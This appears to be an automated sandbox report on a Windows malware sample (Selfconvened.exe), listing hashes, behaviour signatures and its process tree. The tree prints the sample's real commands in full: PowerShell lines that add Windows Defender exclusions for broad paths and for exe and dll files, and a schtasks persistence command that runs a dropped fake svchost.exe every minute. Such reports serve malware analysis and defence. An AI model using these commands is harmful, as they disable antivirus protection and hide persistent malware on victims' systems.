Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23-11-2024 10:54
Static task
static1
Behavioral task
behavioral1
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
b47f14557520a91ca888aa122d5816a21762e25535e24adc62351baf7edd3916.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$TEMP/K3M6Ljh9fd22.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$TEMP/Selfconvened.exe
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
$TEMP/Selfconvened.exe
Resource
win10v2004-20241007-en
General
-
Target
$TEMP/Selfconvened.exe
-
Size
4.5MB
-
MD5
64b5e984fda860eedf19c29a124094fb
-
SHA1
760c195741989e17b48ad52c13bed35e8ea51692
-
SHA256
1f47c67d3baa635c4b7dd2bfed0a26a6bd499c3ab5a64d10b391a52e7d71ba39
-
SHA512
187dbbc7137db41da77dd5c3d1471f82b157d031653109632adb9c49ea519f452b661cfd1845512661dcdb3b00bf2a02b2c3504406fb19ad89b06fcd6afee4e4
-
SSDEEP
98304:xLIWL25lsofrCgl5PmHGjCYv8LHPrVWPa5Qwy:Fslsofuit0bJWPa5QJ
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1676 powershell.exe 1944 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 1612 svchost.exe -
Loads dropped DLL 1 IoCs
pid Process 2404 taskeng.exe -
Drops file in System32 directory 2 IoCs
description ioc Process File created C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe File opened for modification C:\Windows\system32\WindowsPro\svchost.exe Selfconvened.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1076 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 2668 Selfconvened.exe 1676 powershell.exe 1944 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 2668 Selfconvened.exe Token: SeDebugPrivilege 1676 powershell.exe Token: SeDebugPrivilege 1944 powershell.exe Token: SeDebugPrivilege 1612 svchost.exe -
Suspicious use of WriteProcessMemory 15 IoCs
description pid Process procid_target PID 2668 wrote to memory of 1420 2668 Selfconvened.exe 31 PID 2668 wrote to memory of 1420 2668 Selfconvened.exe 31 PID 2668 wrote to memory of 1420 2668 Selfconvened.exe 31 PID 2668 wrote to memory of 1076 2668 Selfconvened.exe 33 PID 2668 wrote to memory of 1076 2668 Selfconvened.exe 33 PID 2668 wrote to memory of 1076 2668 Selfconvened.exe 33 PID 1420 wrote to memory of 1676 1420 cmd.exe 34 PID 1420 wrote to memory of 1676 1420 cmd.exe 34 PID 1420 wrote to memory of 1676 1420 cmd.exe 34 PID 1420 wrote to memory of 1944 1420 cmd.exe 36 PID 1420 wrote to memory of 1944 1420 cmd.exe 36 PID 1420 wrote to memory of 1944 1420 cmd.exe 36 PID 2404 wrote to memory of 1612 2404 taskeng.exe 38 PID 2404 wrote to memory of 1612 2404 taskeng.exe 38 PID 2404 wrote to memory of 1612 2404 taskeng.exe 38 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"C:\Users\Admin\AppData\Local\Temp\$TEMP\Selfconvened.exe"1⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2668 -
C:\Windows\system32\cmd.exe"cmd" #cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1420 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1944
-
-
-
C:\Windows\system32\schtasks.exe"schtasks" /create /f /sc minute /rl highest /mo 1 /tn "Bobsledding" /tr "C:\Windows\system32\WindowsPro\svchost.exe"2⤵
- Scheduled Task/Job: Scheduled Task
PID:1076
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {F40DC70A-C459-4C22-96C7-26AD4C4C5ECE} S-1-5-21-3551809350-4263495960-1443967649-1000:NNYJZAHP\Admin:Interactive:[1]1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2404 -
C:\Windows\system32\WindowsPro\svchost.exeC:\Windows\system32\WindowsPro\svchost.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1612
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5afa5575d0c4498c7287f85a02060e816
SHA18ae2d797a8a7e9c92e6ef6a396005bd75a8ac59e
SHA256f8834503073d7f3832c05202ca10dd2c3d1ac6f0433dfd654889cda4e9f630d0
SHA512368ec22bf90bfbe484863bab50fbe9fb149764a863f6441d08b33208b05fe24fd14adb582d0495365f5628f7b755c97cc1be23c2617df17925584695dfe2662b
-
Filesize
10.3MB
MD58b4918be89e6a43989b82f6c57d04e40
SHA15ad9ed6edb148296f5fdc066de50c832e4254591
SHA2561c13380def89afa50f7503522b936d24fcdb9078141cc4411980b050899ffec2
SHA512b33b1297d8f5c80c843d9df9a44397c8469a8851bebcd809445135deb7de5d3d0a62fc407ca7903499860d5198e9e63d62fdb1542ed762eccf19183ea95daf76